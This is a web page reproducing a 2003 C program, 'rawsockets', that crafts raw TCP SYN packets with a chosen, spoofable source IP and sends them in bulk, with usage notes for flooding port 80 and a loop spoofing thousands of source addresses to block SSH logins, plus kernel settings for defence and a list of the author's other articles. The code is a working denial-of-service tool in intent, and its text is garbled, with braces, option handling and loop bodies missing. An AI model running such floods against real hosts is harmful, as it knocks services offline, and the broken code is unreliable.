/* Copyright GPL 2003 by Mike Chirico <>

  How to use this program.

   You must run this program as root, since it generates raw sockets. The
   following example does a ping SYN flood against 2000000 time
   on port 80.

     $./rawsockets -s -d -n 2000000 -p 80 

  How do you prevent against such an attack? See the following article:

    $ man packet

  ##### Begin DoS Prevention #####                                          
  # shut some DoS stuff down                                                
  echo 1 > /proc/sys/net/ipv4/tcp_syncookies                                
  echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses             
  echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts                   
  # increase the local port range                                           
  echo 1024 65535 > /proc/sys/net/ipv4/ip_local_port_range                  
  # increase the SYN backlog queue                                          
  echo 2048 > /proc/sys/net/ipv4/tcp_max_syn_backlog                        
  echo 0 > /proc/sys/net/ipv4/tcp_sack                                      
  echo 0 > /proc/sys/net/ipv4/tcp_timestamps                                
  echo 64000 > /proc/sys/fs/file-max                                        
  ulimit -n 64000                                                           

 Run the following on a client to test a server against DOS. Below the following
 works against port 22. You will not be able to login.

     for j in `seq 254`                                             
      for i in `seq 256`                                            
       ./rawsockets -s "192.168.$j.$i" -d -p 22 -n 1   

  While the above is running issue the following command on the server.

    $ echo 1 > /proc/sys/net/ipv4/tcp_syncookies

  Also take a look at the number of half-open connections.

    $ netstat -n -t|grep 'SYN_RECV'             


  If you want to set the SackOK

    $ ./rawsockets -s -d -p 80 -n 1 -w 4 -x 2

  Or if you want to set SackOK and mss to 1460

    $ ./rawsockets -s -d -p 80 -n 1 -w 4 -x 2 -y 2 -z 4 -g 5 -h 180

  References for TCP options:


#define __USE_BSD	
#include <sys/socket.h>	
#include <netinet/in.h>	
#include <netinet/ip.h>
#include <arpa/inet.h>
#define __FAVOR_BSD	
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

struct tcp_options
  u_int8_t op0;
  u_int8_t op1;
  u_int8_t op2;
  u_int8_t op3;
  u_int8_t op4;
  u_int8_t op5;
  u_int8_t op6;
  u_int8_t op7;

char datagram[4096]; /* datagram buffer */
char pheader[1024]; /* pseudoheader buffer for computing tcp checksum */

uint16_t  csum (uint16_t * addr, int len)
  int nleft = len;
  uint32_t sum = 0;
  uint16_t *w = addr;
  uint16_t answer = 0;

  while( nleft > 1 ) {
    sum += *w++;
    nleft -= 2;
  if (nleft == 1) {
    *(unsigned char *)  (&answer) = *(unsigned char *) w;
    sum += answer;
  sum = (sum >> 16)+(sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);

int main(int argc, char **argv)

  int flags = 0, c, numtries=90;
  char src_ip[17];
  char dst_ip[17];
  short dst_port=80;
  short th_sport=1234;
  short tcp_flags=TH_SYN;
  short pig_ack=0;
  struct ip *iph = (struct ip *) datagram;
  struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
  struct tcp_options *tcpopt = (struct tcp_options *) (datagram + sizeof(struct ip) + sizeof(struct tcphdr));
  struct sockaddr_in servaddr;
  memset(datagram, 0, 4096); /* zero out the buffer */

  fprintf(stderr,"sizeof (struct ip)= %d\n",sizeof(struct ip));

  snprintf(src_ip,16,"%s","");  //default

  while ((c = getopt(argc, argv, "s:d:n:p:f:a:q:w:x:y:z:g:h:i:j:")) != -1) {
    switch (c) {
    case 's':
      flags |= 0x1;
    case 'd':
      flags |= 0x2;
    case 'n':
      flags |= 0x4;
    case 'p':
      flags |= 0x8;
    case 'f':
    case 'a':
    case 'q':
    case 'w':
    case 'x':
    case 'y':
    case 'z':
    case 'g':
    case 'h':
    case 'i':
    case 'j':
    case '?':
      flags |= 0x10;
      fprintf(stderr, "Unrecognized option  \n");

  if(! ( flags & 0x2  ) ) {
    fprintf(stderr,"\nrawsockets -s <source ip> -d <destination ip> -p <port> -n <number of SYN floods>\n");
    fprintf(stderr,"\nYou must give me a destination\n");
    fprintf(stderr,"  Example:\n\t\t./rawsockets -s -d -p 80 -n 1\n");
    fprintf(stderr,"  Or with SackOK :\n\t\t./rawsockets -s -d -p 80 -n 1 -w 4 -x 2\n");
    fprintf(stderr,"  SackOK and mss 1460:\n\t\t./rawsockets -s -d -p 80 -n 1 -w 4 -x 2 -y 2 -z 4 -g 5 -h 180\n");

    return 1;

  if(getuid( )){
    fprintf(stderr,"\n Also, you must be root to run this program:  ./su -c \"./rawsockets -s <source ip> -d <destination ip> -p 80 -n 2000\"\n");
    return 1;

  fprintf(stdout,"src %s dst %s number of tries %d\n",src_ip,dst_ip,numtries);

  int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
  servaddr.sin_family = AF_INET;
  // servaddr.sin_port = htons (10000);
  //OLD WAY  servaddr.sin_addr.s_addr = inet_addr (dst_ip); /* destination ip */
  inet_pton(AF_INET, dst_ip,&servaddr.sin_addr);
  int tcphdr_size = sizeof(struct tcphdr);

  iph->ip_hl = 5;
  iph->ip_v = 4;
  iph->ip_tos = 0;
  iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr) + 8 +6 +6; /* data size = 0, but tcp using option flags */
  iph->ip_id = htons (31337);
  iph->ip_off = 0;
  iph->ip_ttl = 250;
  iph->ip_p = 6;
  iph->ip_sum = 0;
  //OLD WAY iph->ip_src.s_addr = inet_addr (src_ip);/* source ip  */
  inet_pton(AF_INET, src_ip, &(iph->ip_src));
  iph->ip_dst.s_addr = servaddr.sin_addr.s_addr;

  tcph->th_sport = htons (th_sport); /* source port */
  tcph->th_dport = htons (dst_port); /* destination port */
  tcph->th_seq = htonl(31337);
  tcph->th_ack = htonl(pig_ack);/* in first SYN packet, ACK is not present */
  tcph->th_x2 = 0;
  // tcph->th_off = sizeof(struct tcphdr)/4; /* data position in the packet */
  // Special chirico adjustment to give 2x32
  tcph->th_off = 7+2+1 ;

  fprintf(stderr,"Data offset %d  sizeof(struct tcphdr)=%d\n",tcph->th_off,sizeof(struct tcphdr));
#  define TH_FIN        0x01
#  define TH_SYN        0x02
#  define TH_RST        0x04
#  define TH_PUSH       0x08
#  define TH_ACK        0x10
#  define TH_URG        0x20


  tcph->th_flags = tcp_flags; /* initial connection request */
  tcph->th_win = htons (57344); /* FreeBSD uses this value too */
  tcph->th_sum = 0; /* we will compute it later */
  tcph->th_urp = 0;
  if (tcphdr_size % 4 != 0) /* takes care of padding to 32 bits */
    tcphdr_size = ((tcphdr_size % 4) + 1) * 4;
  fprintf(stderr,"tcphdr_size %d\n",tcphdr_size);
  fprintf(stderr,"tcphdr_size %d\n",tcphdr_size);

  pheader[8]=0; // just to underline this zero byte specified by rfc
  pheader[10]=(u_int16_t)(tcphdr_size & 0xFF00)>>8;
  pheader[11]=(u_int16_t)(tcphdr_size & 0x00FF);

  /* tcpopt->op0=4;   sackOK 
  memcpy(&pheader[12], tcph, sizeof(struct tcphdr));
  memcpy(&pheader[12+ sizeof(struct tcphdr)], tcpopt, sizeof(struct tcp_options));

  fprintf(stderr,"12+sizeof(struct tcphdr)= %d    %d\n",12+sizeof(struct tcphdr),sizeof(struct tcp_options));
  /* This is an example of setting SackOK we need to set it in the
     header for checksum and in the actual data.  This should only get
     sent when using SYN? */

  //  pheader[33]=2;


    fprintf(stderr,"********** %d %d\n",tcpopt->op0,datagram[40]);
    fprintf(stderr,"********** %d %d\n",tcpopt->op1,datagram[41]);

    fprintf(stderr,"csum size is %d\n",tcphdr_size+12);


  tcph->th_sum = csum ((uint16_t *) (pheader),tcphdr_size+12);

  //  iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);

  int one = 1;
  const int *val = &one;
  if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0){
    fprintf(stderr,"Error: setsockopt. You need to run this program as root\n");
      return -1;

  int modval= numtries / 15;
  if (modval < 2) modval = 2;
  int ft=0;
  while(numtries-- > 0)

     if (sendto (s,datagram,iph->ip_len ,0,(struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)
        fprintf(stderr,"Error in sendto\n");
      } else {

        if(ft==0) {
	if ( (numtries % modval) == 0 )


  fprintf(stderr,"sizeof(struct tcp_options)=%d\n",sizeof(struct tcp_options));
  return 0;


Linux System Admin Tips: There are over 190 Linux tips and tricks in this article. That is over 100 pages covering everything from NTP, setting up 2 IP address on one NIC, sharing directories among several users, putting running jobs in the background, find out who is doing what on your system by examining open sockets and the ps command, how to watch a file, how to prevent even root from deleting a file, tape commands, setting up cron jobs, using rsync, using screen conveniently with emacs, how to kill every process for a user, security tips and a lot more. These tip grow weekly. The above link will download the text version for easy grep searching.

Breaking Firewalls with OpenSSH and PuTTY: If the system administrator deliberately filters out all traffic except port 22 (ssh), to a single server, it is very likely that you can still gain access other computers behind the firewall. This article shows how remote Linux and Windows users can gain access to firewalled samba, mail, and http servers. In essence, it shows how openSSH and Putty can be used as a VPN solution for your home or workplace.

MySQL Tips and Tricks: Find out who is doing what in MySQL and how to kill the process, create binary log files, connect, create and select with Perl and Java, remove duplicates in a table with the index command, rollback and how to apply, merging several tables into one, updating foreign keys, monitor port 3306 with the tcpdump command, creating a C API, complex selects, and much more.

Create a Live Linux CD - BusyBox and OpenSSH Included: These steps will show you how to create a functioning Linux system, with the latest 2.6 kernel compiled from source, and how to integrate the BusyBox utilities including the installation of DHCP. Plus, how to compile in the OpenSSH package on this CD based system. On system boot-up a filesystem will be created and the contents from the CD will be uncompressed and completely loaded into RAM -- the CD could be removed at this point for boot-up on a second computer. The remaining functioning system will have full ssh capabilities. You can take over any PC assuming, of course, you have configured the kernel with the appropriate drivers and the PC can boot from a CD. This tutorial steps you through the whole processes.

SQLite Tutorial : This article explores the power and simplicity of sqlite3, first by starting with common commands and triggers, then the attach statement with the union operation is introduced in a way that allows multiple tables, in separate databases, to be combined as one virtual table, without the overhead of copying or moving data. Next, the simple sign function and the amazingly powerful trick of using this function in SQL select statements to solve complex queries with a single pass through the data is demonstrated, after making a brief mathematical case for how the sign function defines the absolute value and IF conditions.

The Lemon Parser Tutorial: This article explains how to build grammars and programs using the lemon parser, which is faster than yacc. And, unlike yacc, it is thread safe.

How to Compile the 2.6 kernel for Red Hat 9 and 8.0 and get Fedora Updates: This is a step by step tutorial on how to compile the 2.6 kernel from source.

Virtual Filesystem: Building A Linux Filesystem From An Ordinary File. You can take a disk file, format it as ext2, ext3, or reiser filesystem and then mount it, just like a physical drive. Yes, it then possible to read and write files to this newly mounted device. You can also copy the complete filesystem, since it is just a file, to another computer. If security is an issue, read on. This article will show you how to encrypt the filesystem, and mount it with ACL (Access Control Lists), which give you rights beyond the traditional read (r) write (w) and execute (x) for the 3 user groups file, owner and other.

Working With Time: What? There are 61 seconds in a minute? We can go back in time? We still tell time by the sun?

Chirico img Mike Chirico, a father of triplets (all girls) lives outside of Philadelphia, PA, USA. He has worked with Linux since 1996, has a Masters in Computer Science and Mathematics from Villanova University, and has worked in computer-related jobs from Wall Street to the University of Pennsylvania. His hero is Paul Erdos, a brilliant number theorist who was known for his open collaboration with others.

Mike's notes page is souptonuts. For open source consulting needs, please send an email to All consulting work must include a donation to Logo Logo